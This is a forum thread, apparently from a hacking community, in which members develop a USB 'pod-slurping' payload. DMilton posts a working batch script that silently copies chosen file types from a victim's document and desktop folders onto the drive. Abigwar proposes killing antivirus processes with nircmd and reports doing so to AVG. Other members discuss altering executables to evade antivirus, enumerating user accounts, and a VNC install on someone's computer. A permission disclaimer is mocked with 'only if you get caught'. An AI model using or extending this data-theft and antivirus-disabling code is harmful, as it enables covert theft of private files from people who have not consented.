USB Pocket-Knife Development

[DMilton]

well i must admit i kinda jumped at the last problem the code does work by defualt my code just displays the version number major.minor (build no)

my output was:

Version is 5.1 (2600)

Press any key to continue . . .

i can make switch based on what os ver is detected

I believe you, then, by the momment, the code do the same as "ver" dos command, isnt it?

yes it needs to be compiled...if i can get this working i will upload it to my site(NOT RS)

is it faster then batch? LOL...you bet your sweet ass it is and its also faster the vb/vbs but if Steve8x or someone else swooped in and coded it in asm...you would see an extreme speed increase

but heh im just a C++ programmer

Im not a C++ programmer, in fact im only a fucking newbie! Feel free to kick my ass in any momment! :(

im just having a small problem understanding whats the purpose of the reason needing this program tho :)

Sorry, if I understand you (my understanding is a bit limmited due im not english speaker but spanish), you ask for the purpose of the needing of this program... As I far I can get, the needing of the program itself will be to do easier and faster the need of testing the OS installed, because it will determine some different behaviours of the payload.

The need of the detection of version language installed will be to do more effective the payload against any system, because the paths of certain programs vary depending of it.

Have I answered your question? don`t worry... kick it!

[DMilton]

I think, there's no need of using the variable progfiles:

SET progfiles=%HOMEDRIVE%\Program Files

or

SET progfiles=%HOMEDRIVE%\Program Files (x86)

Instead of it, if you use the enviroment variable %PROGRAMFILES% in all of the code, it will be not neccesary the progfiles variable.

For example, in Spanish version of any Win OS the path must be chaged to: <_<

SET progfiles=%HOMEDRIVE%\Archivos de Programa

May be it can be changed?

[Rifts]

can you please get the keylogger working

[DMilton]

My mind is bussy, then... here it is something I have working on.

Whe can slurp the data with Slurp2 configuration, but what about slurping certain type of files in the default victim's hdd?

I think is a very good implementation to allow the user to slurp only certain file types as doc, xlm, xls, txt, jpg, etc.

This could be a very good option between Slurp1 (only a few files) and Slurp2 (all the files), depending of the contents we want to slurp, the time we have to do this and the space avaiable in our USB hacking drive.

For this purpose, I've done the next code to slurp the desired data contained in My Documents, Desktop, Shared Desktop and Shared Documents folders. It can be called from the batch looking for the Slurp3.cfg file (Leapo will need to add a menu item for this purpose). :P

Whe can do the attack edditing a plain text file and adding the information whe want to slurp with adding as much lines as file types we want to slurp.

In the example, the txt file must be eddited in the CONFIG directory of our USB and must be called wanted.txt.

*.txt
*.doc
*.xls
*.xml
*.jpg

This example will copy all the files with these extensions to the slurp directory.

Also I and added a simply way for the OS language detection and made some improvements in the variables respect the paths for clearing a bit the batch and allow the batch run correctly in other language installation (Spanish by the momment)

The commented batch is the next:

:: By DMilton for free community
:: Thread http://hak5.org/forums/index.php?showtopic=6746

:: Checks the state of Slurp3.cfg
IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3

::Starts an OS language detection for configuring paths (maybe this could be added to set the initial variables), also it can clean the code too...:). Other languages are very simply to implement too.

:: Detection of ENGLISH OS
IF EXIST "%HOMEDRIVE%%HOMEPATH%\My Documents\" (
set MyD=My Documents
set Dsk=Desktop
set ShDsk=Shared Desktop
set ShDoc=Shared Documents
set MSN=My Received Files

echo The Operating System language is ENGLISH>> %log% 2>&1
)

:: Detection of SPANISH OS (After chinese, the second used language in the world);)
IF EXIST "%HOMEDRIVE%%HOMEPATH%\Mis Documentos\" (
set MyD=Mis Documentos
set Dsk=Escritorio
set ShDsk=Escritorio Compartido
set ShDoc=Documentos Compartidos
set MSN=Mis Archivos Recibidos

echo The Operating System language is SPANISH>> %log% 2>&1
)

:: Sets other variables and paths to clean up pathnams later on
set SlurpDir=%logdir%\Slurp_Data
set Wanted=%config%\wanted.txt

:: Creates the directory structure for the wanted doc option if not exists
IF NOT EXIST "%SlurpDir%\%MyD%\" mkdir "%SlurpDir%\%MyD%\"
IF NOT EXIST "%SlurpDir%\%Dsk%\" mkdir "%SlurpDir%\%Dsk%\"
IF NOT EXIST "%SlurpDir%\%ShDsk%\" mkdir "%SlurpDir%\%ShDsk%\"
IF NOT EXIST "%SlurpDir%\%ShDoc%\" mkdir "%SlurpDir%\%ShDoc%\"
IF NOT EXIST "%SlurpDir%\%MSN%\" mkdir "%SlurpDir%\%MSN%\"


:: Copying the files with the same structure than original looking for extensions at wanted.txt file

for /F %%a in (%wanted%) do (

xcopy "%HOMEDRIVE%%HOMEPATH%\%MyD%\%%a" "%SlurpDir%\%MyD%\" /H /S /D /C
xcopy "%HOMEDRIVE%%HOMEPATH%\%Dsk%\%%a" "%SlurpDir%\%Dsk%\" /H /S /D /C
xcopy "%ALLUSERSPROFILE%\%Dsk%\%%a" "%SlurpDir%\%ShDsk%\" /H /S /D /C
xcopy "%ALLUSERSPROFILE%\%ShDoc%\%%a" "%SlurpDir%\%ShDoc%\" /H /S /D /C
xcopy "%HOMEDRIVE%%HOMEPATH%\%MSN%\%%a" "%SlurpDir%\%MSN%\" /H /S /D /C
)

    ECHO 

----------------------------------------------------------------------------------------------------------------------------- 

>> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +    [Wanted files were copied]    + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
pause
:SkipSlurp3

This was my little contribution to this proyect, I hope it helps!

[DMilton]

If someone can test it, it would be great!

By the way I'm planning and working on (if you consider it usefull) coding a way for:

1.- Implement an slurp option to xcopy a concrete directory/s or file/s given by the user. Yes, I know it's easy, but it's very late and I have to sleep a bit.

2.- Improve the entire payload by using stored REG keys values for installed apps paths. This will made the payload to avoid using fix path variables (for those who change the default paths) and to avoid to make an OS language detection.

[DMilton]

Is someone thinking about a way for recoverying not only actual user account docs but ALL USERS ACCOUNTS?

I have some ideas planning on how to do this but I'll have to squish my tiny and poor brain a bit...

[Jen]

well, wait for leapo to answer you. btw, i can test ur script if u incorporate it into the u3 package and upload it because i'm too dump to add in the script lol

[Abigwar]

I see some issues with your code. Most noteably, other than some scripting that won't work, there is no way to extract the contents of wanted.txt for the batch to know what file extensions are listed in it.

:: By DMilton for free community
:: Thread http://hak5.org/forums/index.php?showtopic=6746

:: Checks the state of Slurp3.cfg
IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3

::Starts an OS language detection for configuring paths (maybe this could be added to set the initial variables), also it can clean the code too...:). Other languages are very simply to implement too.

:: Detection of ENGLISH OS
IF EXIST "%HOMEDRIVE%%HOMEPATH%\My Documents\" (
set MyD=My Documents
set Dsk=Desktop
set ShDsk=Shared Desktop
set ShDoc=Shared Documents
set MSN=My Received Files

echo The Operating System language is ENGLISH>> %log% 2>&1
)

:: Detection of SPANISH OS (After chinese, the second used language in the world);)
IF EXIST "%HOMEDRIVE%%HOMEPATH%\Mis Documentos\" (
set MyD=Mis Documentos
set Dsk=Escritorio
set ShDsk=Escritorio Compartido
set ShDoc=Documentos Compartidos
set MSN=Mis Archivos Recibidos

echo The Operating System language is SPANISH>> %log% 2>&1
)

:: Sets other variables and paths to clean up pathnams later on
set SlurpDir=%logdir%\Slurp_Data
set Wanted=%config%\wanted.txt

:: Creates the directory structure for the wanted doc option if not exists
IF NOT EXIST "%SlurpDir%\%MyD%\" mkdir "%SlurpDir%\%MyD%\"
IF NOT EXIST "%SlurpDir%\%Dsk%\" mkdir "%SlurpDir%\%Dsk%\"
IF NOT EXIST "%SlurpDir%\%ShDsk%\" mkdir "%SlurpDir%\%ShDsk%\"
IF NOT EXIST "%SlurpDir%\%ShDoc%\" mkdir "%SlurpDir%\%ShDoc%\"
IF NOT EXIST "%SlurpDir%\%MSN%\" mkdir "%SlurpDir%\%MSN%\"


:: Copying the files with the same structure than original

for /F %%a in (%wanted%) do (

xcopy "%HOMEDRIVE%%HOMEPATH%\%MyD%\%%a" "%SlurpDir%\%MyD%\" /H /S /D /C
xcopy "%HOMEDRIVE%%HOMEPATH%\%Dsk%\%%a" "%SlurpDir%\%Dsk%\" /H /S /D /C
xcopy "%ALLUSERSPROFILE%\%Dsk%\%%a" "%SlurpDir%\%ShDsk%\" /H /S /D /C
xcopy "%ALLUSERSPROFILE%\%ShDoc%\%%a" "%SlurpDir%\%ShDoc%\" /H /S /D /C
xcopy "%HOMEDRIVE%%HOMEPATH%\%MSN%\%%a" "%SlurpDir%\%MSN%\" /H /S /D /C
)

    ECHO 

----------------------------------------------------------------------------------------------------------------------------- 

>> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +    [Wanted files were copied]    + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
pause
:SkipSlurp3

[Abigwar]

Sorry, I take it back, I missed the FOR command.

Ignore my last post. I will test the script in the morning and report back.

[Matessim]

leapo, please any chance you'll complie version 9.0 with the new additions? and the log email can be included in 10.0, would make it cool*sunglasses? :P*

[m0u53]

to get all user account just do

net users >> allusers.txt

[Abigwar]

I was thinking about something...

We all know AVKill never works anymore because every AV catches it right away.

So... Has anyone tried using nircmd's killprocess to shutdown AV's? If it works, we could create a list of AV processes and then use nircmd to try and shut them ALL down, whether they are installed in that machine or not. The downside, I suppose, would be if the virus scanner alerts that it's processes are being killed, however, what is the difference if the AV is alerting it is seeing infected files on the flashdrive anyway. If for stealth purposes you want to make sure the av is still running after the payload we could force a reboot.

Something along the lines of:

nircmd killprocess avg.exe

What do you all think?

[Abigwar]

Ok! So I tested the Nircmd processkill to kill AVG Antivirus and it worked flawlessly and silently.

I'm going to start a new thread to see if we can develop a list of processes used by AV's.

[Jen]

well, avg is one of the easiest to kill. Try killing kapersky, eset or bitdefender.

[DMilton]

Ok! So I tested the Nircmd processkill to kill AVG Antivirus and it worked flawlessly and silently.

I'm going to start a new thread to see if we can develop a list of processes used by AV's.

It will be very interesting, a good idea but, as Jen said, there's some antivirus very difficult to kill because they run various processes at time and detect when a process is shutdown, then, the living process starts up the dead process again.

The solution may be killing all the processes at a time but I don´t know why, the list of processes starts again in a few seconds in some av.

Other viable solution is to modify the detected exes with changing their signatures for bypass the av scan (I did it with OlyDbg), but it must be done by the end user not by Leapo, because if you publish the new exes will detected as a variant of the original in a few days... I did it but I will not publish them (for obvious reasons). ;)

[DMilton]

well, wait for leapo to answer you. btw, i can test ur script if u incorporate it into the u3 package and upload it because i'm too dump to add in the script lol

I'm waiting for Leapo's answer and I hope there will be useful for this payload.

I haven't incorporated the script to the u3 to test it because of time but with a little few moddifications it can run from a batch itself.

[DMilton]

Sorry, I take it back, I missed the FOR command.

Ignore my last post. I will test the script in the morning and report back.

Don't worry, probably I didn't comment the script too much. ;)

Modified comments to the script in the post.

If you have observed more issues, please, tell us for solving them.

[DMilton]

to get all user account just do

net users >> allusers.txt

:P I know but now, we have to work on this allusers.txt file to extract the variables to the payload...

I'm not plenty of time and I'm working on the other stuff :( , if wanted!

When I have some time, i'll go with this but I think it's a good way to have all the interesting docs in our hands... :o

Of course, this is only for pen-tests, developers and administrative issues (as for a security backup of your own system), don't do it without knowledge of the owner of the system. Don't compromise any system without permission or you will be pursued by law enforcements. <_<

[m0u53]

...not really thats only if you get caught

as much as im dedicatated to this...my flash drive got stolen about a month ago and my dad dosent let me use his anymore..since i somehow bricked his old one lol

[DMilton]

The fact is recicling!

[Jen]

little bit offtopic, buttttt

dmilton, you can just quote all of them in one post, you don't have to separate it into so many posts.

[MtMTheCandyMan]

So I got this amazing work and installed it on my Relay U3 drive and everything ran smoothly, but when I would plug in the drive it would give me an error saying that the file start.bat could not be reached in go.vbs and it said the error was located on line 16 column 9; the line in which the go.vbs says to run start.bat.

I edited the code just a little bit and came up with this:

For Each objDrive in colDrives
    strPath = objDrive.Driveletter & ":"
    If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then
        objShell.Run "Start.bat" & strPath , 0, False
    End If

Now it's not that different, but it got it to understand where the file was. However, it tells me that there's a permission error on line 16 column 9. If I am to understand correctly, there are security features in most OS's that stop VBScript files from running .exe's, how many virii work. Is the OS just not going to allow it to do its job?

So in the end, I just disabled the U3 launcher and am currently using the non-u3 version by putting all the files directly on the flash drive.

I would like to use the regular U3 version though, so any help would be appreciated greatly.

[Jen]

oh, one more thing. I just installed vncviewer on soemone's computer, but then when i go home and connect, it can't connect. I'm guessing that it's because the port isn't open. Is there any way to fix this?

[JoSigurd]

Got this error when running Isocreate.exe

What is wrong?

[Matessim]

leapo are you going to complie version 9 anytime soon?